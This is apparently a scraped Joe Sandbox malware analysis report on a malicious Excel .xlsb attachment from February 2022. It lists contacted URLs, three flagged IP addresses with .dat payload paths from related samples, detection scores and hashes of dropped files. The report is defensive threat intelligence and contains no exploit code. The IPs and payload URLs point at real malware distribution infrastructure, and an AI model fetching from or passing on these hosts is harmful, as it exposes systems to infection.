                      unknown
                      https://rpsticket.partnerservices.getmicrosoftkey.comFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                      • URL Reputation: safe
                      unknown
                      https://lookup.onenote.com/lookup/geolocation/v1FCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                        high
                        https://cortana.aiFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                        • URL Reputation: safe
                        unknown
                        https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                          high
                          https://cloudfiles.onenote.com/upload.aspxFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                            high
                            https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                              high
                              https://entitlement.diagnosticssdf.office.comFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                high
                                https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                  high
                                  https://api.aadrm.com/FCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://ofcrecsvcapi-int.azurewebsites.net/FCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                    high
                                    https://api.microsoftstream.com/api/FCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                      high
                                      https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=ImmersiveFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                        high
                                        https://cr.office.comFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                          high
                                          https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;hFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                          • Avira URL Cloud: safe
                                          low
                                          https://portal.office.com/account/?ref=ClientMeControlFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                            high
                                            https://graph.ppe.windows.netFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                              high
                                              https://res.getmicrosoftkey.com/api/redemptioneventsFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://powerlift-frontdesk.acompli.netFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://tasks.office.comFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                high
                                                https://officeci.azurewebsites.net/api/FCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://sr.outlook.office.net/ws/speech/recognize/assistant/workFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                  high
                                                  https://store.office.cn/addinstemplateFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://api.aadrm.comFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://outlook.office.com/autosuggest/api/v1/init?cvid=FCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                    high
                                                    https://globaldisco.crm.dynamics.comFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                      high
                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                        high
                                                        https://dev0-api.acompli.net/autodetectFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.odwebp.svc.msFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://api.diagnosticssdf.office.com/v2/feedbackFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                          high
                                                          https://api.powerbi.com/v1.0/myorg/groupsFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                            high
                                                            https://web.microsoftstream.com/video/FCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                              high
                                                              https://api.addins.store.officeppe.com/addinstemplateFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://graph.windows.netFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                                high
                                                                https://dataservice.o365filtering.com/FCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://officesetup.getmicrosoftkey.comFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://analysis.windows.net/powerbi/apiFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                                  high
                                                                  https://prod-global-autodetect.acompli.net/autodetectFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://outlook.office365.com/autodiscover/autodiscover.jsonFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                                    high
                                                                    https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-iosFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                                      high
                                                                      https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                                        high
                                                                        https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                                          high
                                                                          https://ncus.contentsync.FCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                                            high
                                                                            https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/FCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                                              high
                                                                              http://weather.service.msn.com/data.aspxFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                                                high
                                                                                https://apis.live.net/v5.0/FCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                                                  high
                                                                                  https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                                                    high
                                                                                    https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                                                      high
                                                                                      https://management.azure.comFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                                                        high
                                                                                        https://outlook.office365.comFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                                                          high
                                                                                          https://wus2.contentsync.FCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          https://incidents.diagnostics.office.comFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                                                            high
                                                                                            https://clients.config.office.net/user/v1.0/iosFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                                                              high
                                                                                              https://insertmedia.bing.office.net/odc/insertmediaFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                                                                high
                                                                                                https://o365auditrealtimeingestion.manage.office.comFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                                                                  high
                                                                                                  https://outlook.office365.com/api/v1.0/me/ActivitiesFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                                                                    high
                                                                                                    https://api.office.netFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                                                                      high
                                                                                                      https://incidents.diagnosticssdf.office.comFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                                                                        high
                                                                                                        https://asgsmsproxyapi.azurewebsites.net/FCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        https://clients.config.office.net/user/v1.0/android/policiesFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                                                                          high
                                                                                                          https://entitlement.diagnostics.office.comFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                                                                            high
                                                                                                            https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                                                                              high
                                                                                                              https://substrate.office.com/search/api/v2/initFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                                                                                high
                                                                                                                https://outlook.office.com/FCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                                                                                  high
                                                                                                                  https://storage.live.com/clientlogs/uploadlocationFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                                                                                    high
                                                                                                                    https://outlook.office365.com/FCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                                                                                      high
                                                                                                                      https://webshell.suite.office.comFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                                                                                        high
                                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                                                                                          high
                                                                                                                          https://substrate.office.com/search/api/v1/SearchHistoryFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                                                                                            high
                                                                                                                            https://management.azure.com/FCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                                                                                              high
                                                                                                                              https://login.windows.net/common/oauth2/authorizeFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                                                                                                high
                                                                                                                                https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://graph.windows.net/FCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://api.powerbi.com/beta/myorg/importsFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://devnull.onenote.comFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://ncus.pagecontentsync.FCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.jsonFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://messaging.office.com/FCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://augloop.office.com/v2FCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://skyapi.live.net/Activity/FCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://clients.config.office.net/user/v1.0/macFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                  • 75% < No. of IPs
                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                  185.141.26.236
                                                                                                                                                  unknownNetherlands
                                                                                                                                                  60117HSAEfalse
                                                                                                                                                  185.252.215.41
                                                                                                                                                  unknownRussian Federation
                                                                                                                                                  49619AIRMOBFRfalse
                                                                                                                                                  188.165.62.32
                                                                                                                                                  unknownFrance
                                                                                                                                                  16276OVHFRfalse
                                                                                                                                                  Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                                  Analysis ID:572924
                                                                                                                                                  Start date:15.02.2022
                                                                                                                                                  Start time:22:59:24
                                                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                                                  Overall analysis duration:0h 5m 2s
                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                  Report type:full
                                                                                                                                                  Sample file name:Summary-313689350-Feb-15.xlsb
                                                                                                                                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                  Run name:Potential for more IOCs and behavior
                                                                                                                                                  Number of analysed new started processes analysed:25
                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                  Technologies:
                                                                                                                                                  • HCA enabled
                                                                                                                                                  • EGA enabled
                                                                                                                                                  • HDC enabled
                                                                                                                                                  • AMSI enabled
                                                                                                                                                  Analysis Mode:default
                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                  Detection:MAL
                                                                                                                                                  Classification:mal80.expl.evad.winXLSB@7/5@0/3
                                                                                                                                                  EGA Information:Failed
                                                                                                                                                  HDC Information:Failed
                                                                                                                                                  HCA Information:
                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                  • Number of executed functions: 0
                                                                                                                                                  • Number of non-executed functions: 0
                                                                                                                                                  Cookbook Comments:
                                                                                                                                                  • Adjust boot time
                                                                                                                                                  • Enable AMSI
                                                                                                                                                  • Found application associated with file extension: .xlsb
                                                                                                                                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                  • Attach to Office via COM
                                                                                                                                                  • Scroll down
                                                                                                                                                  • Close Viewer
                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 52.109.32.63, 52.109.88.39, 52.109.12.21
                                                                                                                                                  • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, prod-w.nexus.live.com.akadns.net, config.officeapps.live.com, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com, europe.configsvc1.live.com.akadns.net
                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                  No simulations
                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  185.141.26.236Summary-573686706-Feb-15.xlsbGet hashmaliciousBrowse
                                                                                                                                                  • 185.141.26.236/2437620704597850.dat
                                                                                                                                                  Summary-573686706-Feb-15.xlsbGet hashmaliciousBrowse
                                                                                                                                                  • 185.141.26.236/1825066150275900.dat
                                                                                                                                                  185.252.215.41Summary-313689350-Feb-15.xlsbGet hashmaliciousBrowse
                                                                                                                                                  • 185.252.215.41/6516776391132270.dat
                                                                                                                                                  Summary-573686706-Feb-15.xlsbGet hashmaliciousBrowse
                                                                                                                                                  • 185.252.215.41/2437620704597850.dat
                                                                                                                                                  Summary-573686706-Feb-15.xlsbGet hashmaliciousBrowse
                                                                                                                                                  • 185.252.215.41/1825066150275900.dat
                                                                                                                                                  188.165.62.32Summary-313689350-Feb-15.xlsbGet hashmaliciousBrowse
                                                                                                                                                  • 188.165.62.32/6516776391132270.dat
                                                                                                                                                  Summary-573686706-Feb-15.xlsbGet hashmaliciousBrowse
                                                                                                                                                  • 188.165.62.32/2437620704597850.dat
                                                                                                                                                  Summary-573686706-Feb-15.xlsbGet hashmaliciousBrowse
                                                                                                                                                  • 188.165.62.32/1825066150275900.dat
                                                                                                                                                  No context
                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  AIRMOBFRSummary-313689350-Feb-15.xlsbGet hashmaliciousBrowse
                                                                                                                                                  • 185.252.215.41
                                                                                                                                                  Summary-573686706-Feb-15.xlsbGet hashmaliciousBrowse
                                                                                                                                                  • 185.252.215.41
                                                                                                                                                  Summary-573686706-Feb-15.xlsbGet hashmaliciousBrowse
                                                                                                                                                  • 185.252.215.41
                                                                                                                                                  HSAESummary-313689350-Feb-15.xlsbGet hashmaliciousBrowse
                                                                                                                                                  • 185.141.26.236
                                                                                                                                                  Summary-573686706-Feb-15.xlsbGet hashmaliciousBrowse
                                                                                                                                                  • 185.141.26.236
                                                                                                                                                  Summary-573686706-Feb-15.xlsbGet hashmaliciousBrowse
                                                                                                                                                  • 185.141.26.236
                                                                                                                                                  ATT72994.htmlGet hashmaliciousBrowse
                                                                                                                                                  • 185.141.25.244
                                                                                                                                                  H7LG5mteEK.exeGet hashmaliciousBrowse
                                                                                                                                                  • 185.244.150.84
                                                                                                                                                  XKPppNZNEj.exeGet hashmaliciousBrowse
                                                                                                                                                  • 185.244.150.84
                                                                                                                                                  eeb0c6a760a7c9d17c02dbacf4f4715917caf3d111209.exeGet hashmaliciousBrowse
                                                                                                                                                  • 185.117.75.139
                                                                                                                                                  ub6vBoyZmA.exeGet hashmaliciousBrowse
                                                                                                                                                  • 185.82.202.246
                                                                                                                                                  Secure_Message_81.90.a1.00.00.htmGet hashmaliciousBrowse
                                                                                                                                                  • 185.141.25.244
                                                                                                                                                  Secure_Message_81.90.a1.00.00.htmGet hashmaliciousBrowse
                                                                                                                                                  • 185.141.25.244
                                                                                                                                                  ATT72994.htmlGet hashmaliciousBrowse
                                                                                                                                                  • 185.141.25.244
                                                                                                                                                  ATT72994.htmlGet hashmaliciousBrowse
                                                                                                                                                  • 185.141.25.244
                                                                                                                                                  Calculation-Letter-1683223396-Jan-25.xlsbGet hashmaliciousBrowse
                                                                                                                                                  • 185.244.149.81
                                                                                                                                                  Calculation-Letter-1683223396-Jan-25.xlsbGet hashmaliciousBrowse
                                                                                                                                                  • 185.244.149.81
                                                                                                                                                  Calculation-1889969399-Jan-24.xlsbGet hashmaliciousBrowse
                                                                                                                                                  • 185.106.123.107
                                                                                                                                                  Calculation-1889969399-Jan-24.xlsbGet hashmaliciousBrowse
                                                                                                                                                  • 185.106.123.107
                                                                                                                                                  hrttshkxhj.exeGet hashmaliciousBrowse
                                                                                                                                                  • 185.198.57.61
                                                                                                                                                  DG3kRWrQrf.exeGet hashmaliciousBrowse
                                                                                                                                                  • 185.198.57.61
                                                                                                                                                  2doPTKCqR8.exeGet hashmaliciousBrowse
                                                                                                                                                  • 185.82.202.246
                                                                                                                                                  9BF4C9B6C5E930CE91B84920A73D9111793E6D3147745.exeGet hashmaliciousBrowse
                                                                                                                                                  • 185.117.73.137
                                                                                                                                                  OVHFRSummary-313689350-Feb-15.xlsbGet hashmaliciousBrowse
                                                                                                                                                  • 188.165.62.32
                                                                                                                                                  EDD Update Form 08221732151.htmlGet hashmaliciousBrowse
                                                                                                                                                  • 158.69.226.152
                                                                                                                                                  Summary-573686706-Feb-15.xlsbGet hashmaliciousBrowse
                                                                                                                                                  • 188.165.62.32
                                                                                                                                                  Summary-573686706-Feb-15.xlsbGet hashmaliciousBrowse
                                                                                                                                                  • 188.165.62.32
                                                                                                                                                  OszQV1HEQJLo5FM.exeGet hashmaliciousBrowse
                                                                                                                                                  • 51.161.116.202
                                                                                                                                                  2lYxDlGzn9.dllGet hashmaliciousBrowse
                                                                                                                                                  • 54.38.242.185
                                                                                                                                                  bashirc.soGet hashmaliciousBrowse
                                                                                                                                                  • 51.79.175.139
                                                                                                                                                  JgLtXCuKO1.dllGet hashmaliciousBrowse
                                                                                                                                                  • 158.69.222.101
                                                                                                                                                  itUwRRwSGgIbxl9.exeGet hashmaliciousBrowse
                                                                                                                                                  • 94.23.214.113
                                                                                                                                                  arm7Get hashmaliciousBrowse
                                                                                                                                                  • 164.132.129.172
                                                                                                                                                  MBSetup.exeGet hashmaliciousBrowse
                                                                                                                                                  • 94.23.1.92
                                                                                                                                                  Invoice.xlsGet hashmaliciousBrowse
                                                                                                                                                  • 54.36.91.62
                                                                                                                                                  20221102_3647_463773,pdf.exeGet hashmaliciousBrowse
                                                                                                                                                  • 94.23.87.86
                                                                                                                                                  ahsok.sh4Get hashmaliciousBrowse
                                                                                                                                                  • 46.105.173.200
                                                                                                                                                  tDb0ggawON.exeGet hashmaliciousBrowse
                                                                                                                                                  • 66.70.204.222
                                                                                                                                                  lsass.exeGet hashmaliciousBrowse
                                                                                                                                                  • 51.79.226.3
                                                                                                                                                  6F2EKlap31.exeGet hashmaliciousBrowse
                                                                                                                                                  • 213.186.33.5
                                                                                                                                                  ZXAAhPUFkw.exeGet hashmaliciousBrowse
                                                                                                                                                  • 51.91.236.255
                                                                                                                                                  No context
                                                                                                                                                  No context
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):143624
                                                                                                                                                  Entropy (8bit):5.3584161903429095
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:zcQIfgxrBdA3guwu/Q9DQW+zUk4F77nXmvidZXtE5LWm69:paQ9DQW+zwXCe
                                                                                                                                                  MD5:09A981AF23701681F549A48CAE81C06D
                                                                                                                                                  SHA1:C7311EB2AB03AE8833ABF3C48BA09417842F16EB
                                                                                                                                                  SHA-256:489C7BD818277E74DF2BECEEB23DA8A56AC9DE26D6ABE3152909EC699BA306AC
                                                                                                                                                  SHA-512:F1292ECAC85DF03FEDD0CD728AE87B0CEBE8B67C4158E27EA34C628FB4346E6C3E0E63D77663652B378D441A307CCE141EE59F33D2DD8741B6E0D12BB297CC57
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2022-02-15T22:00:19">.. Build: 16.0.15004.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1536
                                                                                                                                                  Entropy (8bit):1.1464700112623651
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
                                                                                                                                                  MD5:72F5C05B7EA8DD6059BF59F50B22DF33
                                                                                                                                                  SHA1:D5AF52E129E15E3A34772806F6C5FBF132E7408E
                                                                                                                                                  SHA-256:1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
                                                                                                                                                  SHA-512:6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:PNG image data, 1152 x 649, 8-bit/color RGB, non-interlaced
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):241202
                                                                                                                                                  Entropy (8bit):7.994790738722079
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:6144:LafQTxwGF4p24e6RoPmj6M7R6SFENKq4WneZ:LacxGgF62PFNJno
                                                                                                                                                  MD5:970E90E800998F92DF619BFA12784EDE
                                                                                                                                                  SHA1:9602E3700EAE62493E6109B5A1592C53A75DA62C
                                                                                                                                                  SHA-256:085DF183667B5E23760879126ADEF853988D519E39C18B5A7EBA4B17423D7B6C
                                                                                                                                                  SHA-512:74926BDFA17E196D1A885F9FF51B139B14865430C494E6B598E8B05A8B3D1C6C2D0FF314D871F1074F367CBA5E7BD82CF050D1EBC29A46BA3E39B851E4049D0A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview:.PNG........IHDR.............L.......sRGB.........gAMA......a.....pHYs..........+......IDATx^....E...3.{.&....0g..3.....y.w.%..y'...DA..$.Qr.9.,..%m..S=;,mX...x=..8..TW.......vP.V..Z.Kl> .h60...z@....rP...z..]<../9...9...9....p.%...%...%..\..n........W.C...p.%..\..n....W'../9....p.....:1.~.1.W'..8.....K.!.:1.~.1D.N.._r.....K.!.K.!.K.!.:1.~i....F......Nl:$A...d../.f../mr..2.... .t.........4.Y...g..7W..c.1\.!.~..O#.....5...apV'...9.......g..QN.....x{...b...!.K.!.K.!.:1....1.....\....a....!zub.=.!91.....\....a....!zub...c..N.....m..n.apV'.....K.!.:1$?...:1....,..Y.C.....%..\..n.?c...g1..b..W'..c...?c..N.._r..]r.......3....p.........S.}...."...`.....W.uLk..l=...%=8KP.<......7!A.)`2.8...~.......,..Y..n.ap......g1..b.......g....1...9..b....0$'...%..\..3.Eb....gub.=....<...08....1..b...08.j1dK.....g1....p{..3.Eb....g.3p~.0.h..<.M/^D.`.....Y.v.mv..........zI.a......sa.~......~.S......08....1..~s.....,..Y...:1.....q...1...%..\........08.....ap.H.....N...08....
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):512
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):165
                                                                                                                                                  Entropy (8bit):1.6081032063576088
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                                  MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                                  SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                                  SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                                  SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                                  Preview:.pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                  File type:Microsoft Excel 2007+
                                                                                                                                                  Entropy (8bit):7.964359292186393
                                                                                                                                                  TrID:
                                                                                                                                                  • Excel Microsoft Office Open XML Format document with Macro (51004/1) 36.56%
